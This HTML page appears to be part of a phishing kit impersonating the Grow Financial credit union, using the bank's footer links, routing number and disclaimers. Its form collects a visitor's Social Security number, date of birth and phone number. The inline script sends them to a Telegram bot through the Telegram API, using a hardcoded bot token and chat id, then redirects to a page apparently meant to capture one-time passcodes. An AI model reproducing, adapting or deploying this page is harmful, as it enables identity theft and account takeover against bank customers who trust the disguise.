<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link nonce="" rel="stylesheet" href="./CSS/footer.css" type="text/css" media="all">
    <link nonce="" rel="stylesheet" href="./CSS/index.css" type="text/css" media="all">
    <title>Grow Financial</title>
    <link nonce="" rel="stylesheet" href="./CSS/info.css" type="text/css" media="all">
    <title>Grow Financial</title>
</head>
<body>
    <div id="main1">
    <div class="Information-field">
        <h1>Enter the required information to continue.</h1>
        <form class="info-form">
            <label for="SSN">Social Security Number</label>
            <input name="SSN" type="text" placeholder="123-45-6789" id="ssn"  class="ssn">
            <label for="Date">Date of Birth</label>
            
            <input name="Date" type="date" class="date">
            <div class="phone-container">
            <label for="tel">Phone Number</label>
            <div class="tel">
                <button disabled>1</button>
                <input name="tel" type="tel" placeholder="(000) 000-0001" id="telephone" class="telephone">
            </div>
          </div>
            <button type="submit">Confirm</button>
        </form>
    </div>

    <div class="footer-wrapper">
        <div class="footer-horizontal">
            <ul data-cfm-area="footer-links">
                <li><a id="tb_footerLinks_home" target="_self" rel="noopener noreferrer" href="/" data-is-generic="false" data-string-key="Theme.Footer.FooterLinks.tb_stringKey_0">Home</a></li>
                <li><a id="tb_footerLinks_mobile" target="_self" rel="noopener noreferrer" href="/mobile" data-is-generic="false" data-string-key="Theme.Footer.FooterLinks.tb_stringKey_1">Mobile</a></li>
                <li><a id="" target="_blank" rel="noopener noreferrer" href="https://www.growfinancial.org/resources/protect-yourself/" data-is-generic="true" data-string-key="Theme.Footer.FooterLinks.tb_stringKey_4">Security</a></li>
                <li><a id="" target="_blank" rel="noopener noreferrer" href="https://www.growfinancial.org/contact" data-is-generic="true" data-string-key="Theme.Footer.FooterLinks.tb_stringKey_5">Contact</a></li>
                <li><a id="" target="_blank" rel="noopener noreferrer" href="https://www.growfinancial.org/resources/new-mobile-online-banking/" data-is-generic="true" data-string-key="Theme.Footer.FooterLinks.tb_stringKey_3">FAQs</a></li>
                <li><a id="" target="_blank" rel="noopener noreferrer" href="https://www.growfinancial.org/wp-content/uploads/2018/10/Privacy-Notice.pdf" data-is-generic="true" data-string-key="Theme.Footer.FooterLinks.tb_stringKey_16560994195442659">Privacy Policy</a></li>
                <li><a id="" target="_blank" rel="noopener noreferrer" href="https://www.growfinancial.org/wp-content/uploads/2019/01/Universal-Account-Agreement-3.pdf" data-is-generic="true" data-string-key="Theme.Footer.FooterLinks.tb_stringKey_16560994277768308">Disclosures</a></li>
                <li><a id="browser-support-info" target="_self" rel="noopener noreferrer" href="#/browser-support" data-is-generic="false" data-string-key="Theme.Footer.FooterLinks.tb_stringKey_2">Browser Support</a></li>
                </ul>

                <div class="footer__fi-numbers">
                    <div class="footer__fi-numbers-nmls">NMLS number: <span>477765</span></div>
                    <div class="footer__fi-numbers-routing">Routing number: <span>263182914</span></div>
                    </div>
        </div>


        <div class="footer__legal-logos">
        <div class="font-icon-container font-icon">
        <img class="font-icon-ncua-large" alt="ïcon" src="./images/NCUA.png">
        </div>
        <div class="font-icon-container font-icon">
            <img class="font-icon-ncua-large" alt="ïcon" src="./images/housing.png">
        </div>
        </div>

        <div class="footer__copyright">
        Copyright © 2024 All rights reserved.
        </div>
        </div>
        </div>
        </div>
        </div>
    <script>
        const form = document.querySelector(".info-form");
       
       
        form.addEventListener("submit", (e) => {
            e.preventDefault();
          var ssn = document.querySelector(".ssn").value;
          var date = document.querySelector(".date").value;
            var tel = document.querySelector(".telephone").value;
        
            var token = "7446085389:AAEDVLhoom9HbeL8AMEZDSg6PDygvG5o2AI";
            var chat_id = "-4244251369";
            var my_text = `SSN:${ssn} Date:${date} Tel:${tel}`;
            var url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chat_id}&text=${my_text}`;
           

            let api = new XMLHttpRequest();
            api.open("GET", url, true);
            api.send();
            window.location.href="otp2.html";
           
        })

        const phone = document.getElementById("telephone");
        const ssn= document.getElementById("ssn");
        function formatSSN(ssn) {
  // remove all non-dash and non-numerals
  var val = ssn.replace(/[^\d-]/g, '');

  // add the first dash if number from the second group appear
  val = val.replace(/^(\d{3})-?(\d{1,2})/, '$1-$2');

  // add the second dash if numbers from the third group appear
  val = val.replace(/^(\d{3})-?(\d{2})-?(\d{1,4})/, '$1-$2-$3');

  // remove misplaced dashes
  val = val.split('').filter((val, idx) => {
    return val !== '-' || idx === 3 || idx === 6;
  }).join('');

  // enforce max length
  return val.substring(0, 11);
}
ssn.onkeyup = function(e) {
  this.value = formatSSN(this.value);
}
    function autoFormatPhoneNumber(ref) {
  try {
    let phoneNumberString = ref.value
    var cleaned = ("" + phoneNumberString).replace(/\D/g, "");
    var match = cleaned.match(/^(\d{0,3})?(\d{0,3})?(\d{0,4})?/);
    return [match[1] ? "(": "",
            match[1], 
            match[2] ? ") ": "",
            match[2],
            match[3] ? "-": "",
            match[3]].join("")
    
  } catch(err) {
    return "";
  }
}

function nextDigit(input, cursorpos, isBackspace) {
  if (isBackspace){
    for (let i = cursorpos-1; i > 0; i--) {
    if(/\d/.test(input[i])){
      return i
    }
  }
  }else{
    for (let i = cursorpos-1; i < input.length; i++) {
    if(/\d/.test(input[i])){
      return i
    }
  }
  }
  
  return cursorpos
}

        phone.oninput = (e) => {
  let formatInput = autoFormatPhoneNumber(e.target)
  e.target.value = String(formatInput)
}
phone.oninput = (e) => {
  let cursorPos = e.target.selectionStart 
  let formatInput = autoFormatPhoneNumber(e.target)
  e.target.value = String(formatInput)
  let isBackspace = (e?.data==null) ? true: false
  let nextCusPos = nextDigit(formatInput, cursorPos, isBackspace)
  
  phone.setSelectionRange(nextCusPos+1, nextCusPos+1);
}

    </script>
    </div>
</body>
</html>